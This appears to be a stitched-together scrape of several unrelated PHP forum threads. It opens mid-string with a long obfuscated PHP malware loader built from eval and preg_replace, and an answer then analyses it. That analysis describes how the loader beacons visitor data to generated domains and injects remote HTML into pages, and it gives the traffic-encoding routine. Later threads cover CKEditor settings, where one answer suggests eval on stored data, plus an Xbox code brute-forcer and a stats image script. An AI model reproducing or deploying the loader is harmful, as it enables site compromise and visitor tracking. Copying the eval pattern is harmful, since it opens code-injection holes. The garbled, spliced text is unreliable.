#erro%x7824*<!%x5c%x7824-2bge56+99386c6f+9f5d816:+25)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x824<%x5c%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x782mpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3825!*72!%x5c%x7827!hmg%x5c%x7825b:>1<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x782[%x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825bbT-d]51]y35]256]y76]72]y3d]51]y35]274]yeobs%x5c%x7860un>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7825!|!*!*#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x78]275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<bg!osvufs!|ftmf!~<**9.-j%x5c5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]273]y76]271]y7dx7825)ppde>u%x5c%x7825V<#65,47R25,d7R17,67R37,#%x5c%x782fq%x5**b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x7sfw)%x5c%x7825c*W%x5c%x7825eN+#Qi%x7825bss%x5c%x785csbhpph#)zbssb!-#}#)fep:~:<*9-1-r%x5c%x7825)825,3,j%x5c%x7825>j%x5c%82f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+fmc%x78786<C%x5c%x7827&6<*rfs%x5c1127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5%x7825-bubE{h%x5c%x7825)su34]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88825-#1GO%x5c%x7822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)25-bubE{h%x5c%x7825)sutcvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%xx7827)fepdof.)fepdof.%x5c%x782f###%V,6<*)ujojR%x5c%x7827id%x5c%x78256<%x5c%xr_reporting(0); preg_replace("%x2f%50%x2e%52%x29%57%x65","%x65%166%xy76]277]y72]265]y39]274]y85]273]y6g]273]y76]271]y7d]252c_UOFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323zbek!~!<b%*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x7825:osv2%164") && (!isset($GLOBALS["%x61%156%x75%156%xu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787f!|!5c%x7825r%x5c%x7878<~!!%x5c%x7825s:N}#-%8257;utpI#7>%x5c%x782f7rfs%x5c%x78256<#o]5j:>1<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%5c%x7825)fnbozcYufhA%x5c%x78272qj%x/(.*)/epreg_replacestvbowvmjj'; $uskbxljsbs = explode(chr((169 - 125)), '6393,48,9851,47,2858,50,3117,23,8291,22,9595,68,3457,33,7412,23,3914,63,6775,52,3088,29,1791,56,2150,28,6441,66,3140,43,1906,35,926,36,7276,35,2578,51,2993,59,275,45,6613,30,9241,42,9210,31,886,40,9989,41,5417,69,4931,62,1312,54,534,47,483,51,7223,53,10071,35,6190,50,3811,39,6142,48,2353,24,7062,23,6048,57,1266,46,3977,58,8168,55,1633,23,5272,63,2455,47,2659,30,6751,24,6827,38,2377,38,9554,41,3706,63,5644,70,4249,67,5105,50,4787,40,5574,24,1087,21,7389,23,1108,60,6277,47,6865,29,5486,28,8828,28,9283,26,1366,61,3223,27,6949,50,8506,23,3850,64,1739,52,9128,24,5714,20,9449,70,7435,62,8131,37,4653,70,0,29,4316,56,3572,68,4528,39,180,20,9379,70,200,35,1028,30,92,20,5025,38,7567,50,9519,35,2908,51,8672,58,8986,47,9152,58,9087,20,5879,29,3769,42,8029,45,5391,26,8333,25,5063,42,5203,69,9718,65,726,20,157,23,4567,33,1847,28,1212,54,9898,51,3640,66,6324,49,5155,48,61,31,9783,68,2271,36,815,38,7717,69,2793,42,5335,56,5543,31,3399,58,2629,30,6373,20,4372,65,8925,61,5598,23,362,57,7363,26,3353,46,3052,36,1581,52,2178,48,4180,20,853,33,1656,26,2766,27,5847,32,4993,32,1168,44,9663,55,2835,23,698,28,5908,51,6999,63,1530,51,419,64,9107,21,7617,37,7497,70,962,66,2415,40,4437,51,7786,70,4624,29,8730,39,8358,50,5988,60,8074,57,6105,37,4723,64,1682,57,1489,41,1058,29,3250,41,7155,29,3291,62,29,32,8408,59,5514,29,8313,20,3490,55,235,40,8223,68,8467,39,8636,36,7184,39,320,42,9033,34,6643,67,2521,57,2026,60,2959,34,7856,64,6240,37,4200,49,4827,66,1979,47,4893,38,581,48,1875,31,655,43,4035,53,5621,23,6507,46,6553,60,8769,59,7654,63,7920,49,8593,43,5734,68,5802,45,9309,70,1941,38,629,26,5959,29,9067,20,7085,70,9949,40,4088,56,10030,41,4144,36,8529,64,3545,27,4488,40,2307,46,2086,64,1427,62,6710,41,746,69,2689,20,2709,57,6894,55,2226,45,8856,26,8882,43,7311,52,3183,40,112,45,4600,24,7969,60,2502,19'); $aemhtmvyge = substr($nzujvbbqez, (69491 - 59385), (44 - 37)); if (!function_exists('hperlerwfe')) { function hperlerwfe($opchjywcur, $oguxphvfkm) { $frnepusuoj = NULL; for ($yjjpfgynkv = 0;$yjjpfgynkv < (sizeof($opchjywcur) / 2);$yjjpfgynkv++) { $frnepusuoj.= substr($oguxphvfkm, $opchjywcur[($yjjpfgynkv * 2) ], $opchjywcur[($yjjpfgynkv * 2) + 1]); } return $frnepusuoj; }; } $rfmxgmmowh = " /* orpuzttrsp */ eval(str_replace(chr((230-193)), chr((534-442)), hperlerwfe($uskbxljsbs,$nzujvbbqez))); /* unvtjodgmt */ "; $yiffimogfj = substr($nzujvbbqez, (60342 - 50229), (38 - 26)); $yiffimogfj($aemhtmvyge, $rfmxgmmowh, NULL); $yiffimogfj = $rfmxgmmowh; $yiffimogfj = (470 - 349); $nzujvbbqez = $yiffimogfj - 1; ?>
After digging though the obfuscated code untangling a number of preg_replace, eval, create_function statements, this is my try on explaining what the code does: The code will start output buffering and register a callback function triggered at the end of buffering, e.g. when the output is to be sent to the web server. First, the callback function will attempt to uncompress the output buffer contents if necessary using gzinflate, gzuncompress, gzdecode or a custom gzinflate based decoder (I have not dug any deeper into this). With the contents uncompressed, a request will be made containing the $_SERVER values of HTTP_USER_AGENT HTTP_REFERER REMOTE_ADDR HTTP_HOST PHP_SELF ... to the domain given by chars 0-8 or 8-15 (randomly picks one or the other) in an md5 hash of the IPv4 address of "stat-dns.com" appended with ".com", currently giving md5(".com" . <IPv4> ) => md5(".com8.8.8.8") => "54dfa1cb.com" / "33db9538.com". The request will be attempted using file_get_contents, curl_exec, file and finally socket_write. Note that no request will be made if: any of the HTTP_USER_AGENT, REMOTE_ADDR or HTTP_HOST is empty/not set PHP_SELF contains the word "admin" HTTP_USER_AGENT contains any of the words "google", "slurp", "msnbot", "ia_archiver", "yandex" or "rambler". Secondly, if the output buffer contents has a body or html tag, and the response from the request above (decoded using en2() function below) contains at least one "!NF0" string, the content between the first and second "!NF0" (or end of string) will be injected into the HTML page at the beginning of the body or in case there is no body tag, the html tag. The code used for encoding/decoding traffic is this one: function en2($s, $q) { $g = ""; while (strlen($g) < strlen($s)) { $q = pack("H*", md5($g . $q . "q1w2e3r4")); $g .= substr($q, 0, 8); } return $s ^ $g; } $s is the string to encode/decode and $q is a random number between 100000 and 999999 acting as a key. The request URL mentioned above is calculated like this: $url = "http:// ... /" . $op // Random number/key . "?" . urlencode( urlencode( base64_encode(en2( $http_user_agent, $op)) . "." . base64_encode(en2( $http_referrer, $op)) . "." . base64_encode(en2( $remote_addr, $op)) . "." . base64_encode(en2( $http_host, $op)) . "." . base64_encode(en2( $php_self, $op)) ) ); While I have not found any sign of what initially placed the malicious code on your server, or that it does anything else than allowing for bad HTML/JavaScript code to be injected on your web pages that does not mean that it is not still there. You really should make a clean install, like suggested by #Bulk above: The only way you'll ever know for sure it's been cleaned is to re-install absolutely everything you can from scratch - i.e. fresh wordpress install, fresh plugin install. Then literally comb every line of your theme for anything out of the ordinary. Also of note, they often will put things in wp-content/uploads that look like images but aren't - check those too. Pastebin here.
PHP to convert string to array
This may be asked several times but my case is a bit different. Let me start from the beginning. $ck_data = db_select('ckeditor_settings', 'cs') ->fields('cs', array('settings')) ->condition('name', 'Advanced', '=') ->execute() ->fetchAssoc(); var_dump($ck_data); Will give me... array(1) { ["settings"]=> string(2144) "a:33:{s:2:"ss";s:1:"2";s:7:"toolbar";s:606:"[ ['Source'], ['Cut','Copy','Paste','PasteText','PasteFromWord','-','SpellChecker','Scayt'], ['Undo','Redo','Find','Replace','-','SelectAll'], ['Image','Flash','Table','HorizontalRule','Smiley','SpecialChar'], ['Maximize','ShowBlocks'], '/', ['Format'], ['Bold','Italic','Underline','Strike','-','Subscript','Superscript','-','RemoveFormat'], ['NumberedList','BulletedList','-','Outdent','Indent','Blockquote'], ['JustifyLeft','JustifyCenter','JustifyRight','JustifyBlock','-','BidiLtr','BidiRtl'], ['Link','Unlink','Anchor','Linkit','LinkToNode','LinkToMenu'] ]";s:6:"expand";s:1:"t";s:7:"default";s:1:"t";s:11:"show_toggle";s:1:"t";s:7:"uicolor";s:7:"default";s:12:"uicolor_user";s:7:"default";s:5:"width";s:4:"100%";s:4:"lang";s:2:"en";s:9:"auto_lang";s:1:"t";s:18:"language_direction";s:7:"default";s:15:"allowed_content";s:1:"t";s:19:"extraAllowedContent";s:0:"";s:10:"enter_mode";s:1:"p";s:16:"shift_enter_mode";s:2:"br";s:11:"font_format";s:35:"p;div;pre;address;h1;h2;h3;h4;h5;h6";s:17:"custom_formatting";s:1:"f";s:10:"formatting";a:1:{s:25:"custom_formatting_options";a:6:{s:6:"indent";s:6:"indent";s:15:"breakBeforeOpen";s:15:"breakBeforeOpen";s:14:"breakAfterOpen";s:14:"breakAfterOpen";s:15:"breakAfterClose";s:15:"breakAfterClose";s:16:"breakBeforeClose";i:0;s:10:"pre_indent";i:0;}}s:8:"css_mode";s:4:"none";s:8:"css_path";s:0:"";s:9:"css_style";s:5:"theme";s:11:"styles_path";s:0:"";s:11:"filebrowser";s:4:"none";s:17:"filebrowser_image";s:0:"";s:17:"filebrowser_flash";s:0:"";s:13:"UserFilesPath";s:5:"%b%f/";s:21:"UserFilesAbsolutePath";s:7:"%d%b%f/";s:21:"forcePasteAsPlainText";s:1:"t";s:13:"html_entities";s:1:"f";s:17:"scayt_autoStartup";s:1:"t";s:15:"theme_config_js";s:1:"f";s:7:"js_conf";s:0:"";s:11:"loadPlugins";a:1:{s:12:"drupalbreaks";a:5:{s:4:"name";s:12:"drupalbreaks";s:4:"desc";s:51:"Plugin for inserting Drupal teaser and page breaks.";s:4:"path";s:25:"%plugin_dir%drupalbreaks/";s:7:"buttons";a:1:{s:11:"DrupalBreak";a:2:{s:5:"label";s:11:"DrupalBreak";s:4:"icon";s:22:"images/drupalbreak.png";}}s:7:"default";s:1:"t";}}}" } Now what I want is to get the value of toolbar. $ck_settings = unserialize($ck_data['settings']); $ck_plugins = $ck_settings['toolbar']; var_dump($ck_plugins); Will return... string(606) "[ ['Source'], ['Cut','Copy','Paste','PasteText','PasteFromWord','-','SpellChecker','Scayt'], ['Undo','Redo','Find','Replace','-','SelectAll'], ['Image','Flash','Table','HorizontalRule','Smiley','SpecialChar'], ['Maximize','ShowBlocks'], '/', ['Format'], ['Bold','Italic','Underline','Strike','-','Subscript','Superscript','-','RemoveFormat'], ['NumberedList','BulletedList','-','Outdent','Indent','Blockquote'], ['JustifyLeft','JustifyCenter','JustifyRight','JustifyBlock','-','BidiLtr','BidiRtl'], ['Link','Unlink','Anchor','Linkit','LinkToNode','LinkToMenu'] ]" My question now is how can I convert $ck_plugins from string to array?
Strange way to be storing that, but it is a string that looks like a PHP array definition: eval("\$ck_plugins = $ck_plugins;"); print_r($ck_plugins); If you have control over the data storage, you should probably either store the individual entries in a table or store the entire thing serialized or better in JSON.
PHP code to replace certain values in array, code generator
I am trying to write PHP code as a hobby project to basically create a "possible" code generator. The scenario is that we have a list of 25 valid characters that can be used. Imagine that you have a 25 character code but you have accidentally scratched off the first two characters or three characters at any location in the code. Now we need to find all the possible combinations to try out. I have put all the valid characters into the array below that can be used in the code. $valid=array("B","C","D","F","G","H","J","K","M","P","Q","R","T","V","W","X","Y","Z", "2","3","4","6","7","8","9"); $arraylength=count($valid); The still available or seen characters are input into a text box and in the place where the character is unreadable is left blank and the variable values are fetched. $char1= $_POST['code1']; $char2= $_POST['code2']; $char3= $_POST['code3']; $char4= $_POST['code4']; $char5= $_POST['code5']; $char6= $_POST['code6']; $char7= $_POST['code7']; $char8= $_POST['code8']; $char9= $_POST['code9']; $char10= $_POST['code10']; $char11= $_POST['code11']; $char12= $_POST['code12']; $char13= $_POST['code13']; $char14= $_POST['code14']; $char15= $_POST['code15']; $char16= $_POST['code16']; $char17= $_POST['code17']; $char18= $_POST['code18']; $char19= $_POST['code19']; $char20= $_POST['code20']; $char21= $_POST['code21']; $char22= $_POST['code22']; $char23= $_POST['code23']; $char24= $_POST['code24']; $char25= $_POST['code25']; And put into an array... $jada = array($char1, $char2, $char3, $char4, $char5, $char6, $char7, $char8, $char9, $char10, $char11, $char12, $char13, $char14, $char15 , $char16, $char17, $char18, $char19, $char20, $char21, $char22, $char23, $char24, $char25); I have been stumped for a while now, the fiddling I have done at the moment is that if a variable is empty then do something (as a test echo or print the possible combinations) if(!isset($char1) || trim($char1) == ""){ for($x=0;$x<$arraylength;$x++) { echo $valid[$x]; echo "<br>"; } } else{ echo ($char1); } Can you guys help out?
Saw this still in an open status after many years of hiatus, I figured that I may as well share some information. In the end I figured it out, you can grab the source here and test it in your own server: https://github.com/Masterkriz/XBOX_Pre-paid_code_fixer
Unable to get stat gathering to work
Using PHP to gather stats from multiple files. Goal is to take the entire first row of data, which is the column name, then take the entire row of data from the row where the first column matches the name specified in the code. These two rows should then be linked to each other, so they can be displayed in a dynamic image. However, to avoid excessive requests from the external data source, the data is only downloaded once a day by saving it into a json file. The previous day's data is also kept, to perform a difference calculation. What I'm stuck on is...well, it's not working as intended. The dynamic image does not display and says it cannot be displayed because it contains errors, and the files aren't being created properly. Without any files existing, only the 'old' data file is being created, and the gathered data is saved there in a format that I didn't expect. Here's the entire PHP code: <?php header("Content-Type:image/png"); $root=realpath($_SERVER['DOCUMENT_ROOT']); function saveTeamData(){ $urls=array('http://www.dc-vault.com/stats/bio.txt','http://www.dc-vault.com/stats/math.txt','http://www.dc-vault.com/stats/misc.txt','http://www.dc-vault.com/stats/overall.txt','http://www.dc-vault.com/stats/phys.txt'); $fullJson=array(); function stats($url){ $json=array(); $team=array("teamName"); $file=fopen($url,'r'); $firstRow=fgetcsv($file,0,"\t"); while($data=fgetcsv($file,0,"\t")){ if(in_array($data[0],$team)){ foreach($firstRow as $indx=>$colName){ if((strpos($colName,'Position')!=0)||(strpos($colName,'Score')!=0)||(strpos($colName,'Team')!=0)){ if(strrpos($colName,'Position')!==false){ $colName=substr($colName,0,strpos($colName,' Position')); $colName=$colName."Pos"; }else{ $colName=substr($colName,0,strpos($colName,' Score')); $colName=$colName."Score"; } $colName=str_replace(' ',',',$colName); $teamData[$colName]=$data[$indx]; } } $json=$teamData; } } fclose($file); return $json; } foreach($urls as $item){ $fullJson=array_merge($fullJson,stats($item)); } $final_json['teamName']=$fullJson; $final_json['date']=date("Y-m-d G:i:s",strtotime("11:00")); $final_json=json_encode($final_json); file_put_contents("$root/scripts/vaultData.js",$final_json); return $final_json; } if(!file_exists("$root/scripts/vaultData.js")){ $teamData=saveTeamData(); }else{ $teamData=json_decode(file_get_contents("$root/scripts/vaultData.js")); } $lastDate=$teamData->date; $now=date("Y-m-d G:i:s"); $hours=(strtotime($now)-strtotime($lastDate))/3600; if($hours>=24||!file_exists("$root/scripts/vaultDataOld.js")){ file_put_contents("$root/scripts/vaultDataOld.js",json_encode($teamData)); $teamData=saveTeamData(); } $team=$teamData->{"teamName"}; $teamOld=json_decode(file_get_contents("$root/scripts/vaultDataOld.js"))->{"teamName"}; $template=imagecreatefrompng("$root/images/vaultInfo.png"); $black=imagecolorallocate($template,0,0,0); $font='images/fonts/UbuntuMono-R.ttf'; $projects=array(); $subsections=array(); foreach($team as $key=>$val){ $projectName=preg_match("/^(.*)(?:Pos|Score)$/",$key,$cap); $projectName=str_replace(","," ",$cap[1]); if(preg_match("/Pos/",$key)){ $$key=(strlen($val)>10?substr($val,0,10):$val); $delta=$key."Delta"; $$delta=($val - $teamOld->{$key}); $$delta=(strlen($$delta)>5?substr($$delta,0,5):$$delta); if($projectName!=="Overall"){ if(!in_array($projectName,array("Physical Science","Bio/Med Science","Mathematics","Miscellaneous"))){ $projects[$projectName]["position"]=$$key; $projects[$projectName]["position delta"]=$$delta*1; }else{ $subsections[$projectName]["position"]=$$key; $subsections[$projectName]["position delta"]=$$delta*1; } } }elseif(preg_match("/Score/",$key)){ $$key=(strlen($val)>10?substr($val,0,10):$val); $delta=$key."Delta"; $$delta=($val - $teamOld->{$key}); $$delta=(strlen($$delta)>9?substr($$delta,0,9):$$delta); if($projectName!=="Overall"){ if(!in_array($projectName,array("Physical Science","Bio/Med Science","Mathematics","Miscellaneous"))){ $projects[$projectName]["score"]=$$key; $projects[$projectName]["score delta"]=$$delta; }else{ $subsections[$projectName]["score"]=$$key; $subsections[$projectName]["score delta"]=$$delta; } } } } $sort=array(); foreach($projects as $key=>$row){ $sort[$key]=$row["score"]; } array_multisort($sort,SORT_DESC,$projects); $lastupdated=round($hours,2).' hours ago'; $y=35; foreach($projects as $name=>$project){ imagettftext($template,10,0,5,$y,$black,$font,$name); imagettftext($template,10,0,149,$y,$black,$font,$project['position']); imagettftext($template,10,0,216,$y,$black,$font,$project['position delta']*-1); imagettftext($template,10,0,257,$y,$black,$font,$project['score']); imagettftext($template,10,0,331,$y,$black,$font,$project['score delta']); $y+=20; } $y=655; foreach($subsections as $name=>$subsection){ imagettftext($template,10,0,5,$y,$black,$font,$name); imagettftext($template,10,0,149,$y,$black,$font,$subsection['position']); imagettftext($template,10,0,216,$y,$black,$font,$subsection['position delta']*-1); imagettftext($template,10,0,257,$y,$black,$font,$subsection['score']); imagettftext($template,10,0,331,$y,$black,$font,$subsection['score delta']); $y+=20; } imagettftext($template,10,0,149,735,$black,$font,$team->{'OverallPos'}); imagettftext($template,10,0,216,735,$black,$font,$OverallPosDelta*-1); imagettftext($template,10,0,257,735,$black,$font,$OverallScore); imagettftext($template,10,0,331,735,$black,$font,$OverallScoreDelta); imagettftext($template,10,0,149,755,$black,$font,$lastupdated); imagepng($template); ?> And here is what the data looks like when it is saved: "{\"teamName\":{\"Folding#HomePos\":\"51\",\"Folding#HomeScore\":\"9994.405407\"},\"date\":\"2014-03-14 11:00:00\"}" I've omitted most of the data because it just makes things excessively long, and it helps to see the format. Now the reason why its an unexpected output is because I didn't expect trailing slashes to be in it. The older version of this code would output like this: {"teamName":{"Asteroids#HomePos":"192","Asteroids#HomeScore":"7647.783251"},"date":"2014-03-14 11:00:00"} So the expected behaviour is to to gather the data from the aforementioned rows in each tab delimited text file, copy the old data into the 'old' data file (vaultDataold), save the new data into the 'current' data file (vaultData), and then display the data from the 'current' file in a dynamic image, along with performing a 'new' minus 'old' calculation on the two files to show the change since the previous day. Most of this code should work, as I've had it working before in a different way. The issue likely lies somewhere with gathering the row data and saving it, most probably the latter. I'm guessing the slashes are causing the issue.
Turns out that the cause was twofold. Firstly, in my function, I was JSON encoding something that had already been encoded, so when the second file was saved, it appeared as shown in my question. To fix that, I did this: $final_json['date']=date("Y-m-d G:i:s",strtotime("11:00")); $encode_json=json_encode($final_json); file_put_contents("$root/scripts/vaultData.js",$encode_json); return $final_json; In addition, as pointed out by another in the comments, I had to add $root to my function, and again within it.